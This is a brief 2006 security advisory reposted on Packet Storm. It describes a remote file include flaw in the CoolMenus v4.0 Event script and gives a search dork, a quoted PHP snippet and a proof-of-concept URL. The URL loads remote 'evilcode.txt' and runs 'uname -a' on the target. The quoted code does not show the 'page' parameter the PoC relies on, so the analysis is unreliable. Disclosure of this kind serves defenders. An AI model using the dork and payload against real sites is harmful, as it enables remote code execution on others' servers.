CoolMenus.txt

2006-04-29T00:00:00
ID PACKETSTORM:45921
Type packetstorm
Reporter Andries Bruinsma
Modified 2006-04-29T00:00:00

Description

                                        
                                            `Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html  
  
#ColMenus Event Remote File Include Vulnerability#  
#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]  
#Script : CoolMenus v4.0 Event Script  
#Risk : High  
#Class : Remote  
#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..  
#d0rk : "/event/index.php?page="   
  
I.  
  
  
require("event_inc.php");   
echo "Events";   
$start = filectime($news);   
$jetzt = time();   
$update = "$start"+"$timespan";   
if($jetzt >= $update)   
{include("event_html.php");}   
  
II.  
  
Proof of Concept:  
  
http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a  
`